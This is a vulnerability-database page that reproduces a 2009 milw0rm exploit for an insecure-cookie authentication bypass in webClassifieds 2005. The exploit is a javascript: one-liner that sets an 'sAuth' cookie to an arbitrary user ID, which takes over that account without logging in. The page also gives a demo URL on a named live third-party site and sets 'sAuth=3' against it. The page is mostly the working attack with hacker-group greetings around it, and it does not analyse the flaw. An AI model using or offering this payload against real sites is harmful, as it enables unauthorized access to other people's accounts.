webClassifieds 2005 - (Authentication Bypass) Insecure Cookie Handling

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1057712 漏洞类型
发布时间 2009-04-20 更新时间 2009-04-20
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/8486
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
[~] ----------------------------بسم الله الرحمن الرحيم------------------------------
 [~]Tybe:webClassifieds© 2005 Insecure Cookie Handling Vulnerability
  
 [~]Vendor: www.webscribble.com
  
 [~]Software: webClassifieds© 2005
  
 [~]author: ThE g0bL!N
  
  
 [~] Home: WWW.h4ckf0ru.com
  

[~] -----------------------------{ Iam MuSlIm}------------------------------
  
  
 [~] Exploit:
  
javascript:dcocument.cookie="sAuth=[id];path=/";
  
[~]login 4 d3m0:
  
http://www.towpartners.com/classifieds/index.php?page=sign_in
 
javascript:document.cookie="sAuth=3;path=/";
[~]--------------------------------------------------------------------------------
 
  [~] Greetz tO:
  [~]
  [~] Dos-Dz TeaM - Snakes TeaM - Team Sobh4n ALLAH
  [~]
  [~]
  [~]
  [~]
 
 [~]--------------------------------------------------------------------------------

# milw0rm.com [2009-04-20]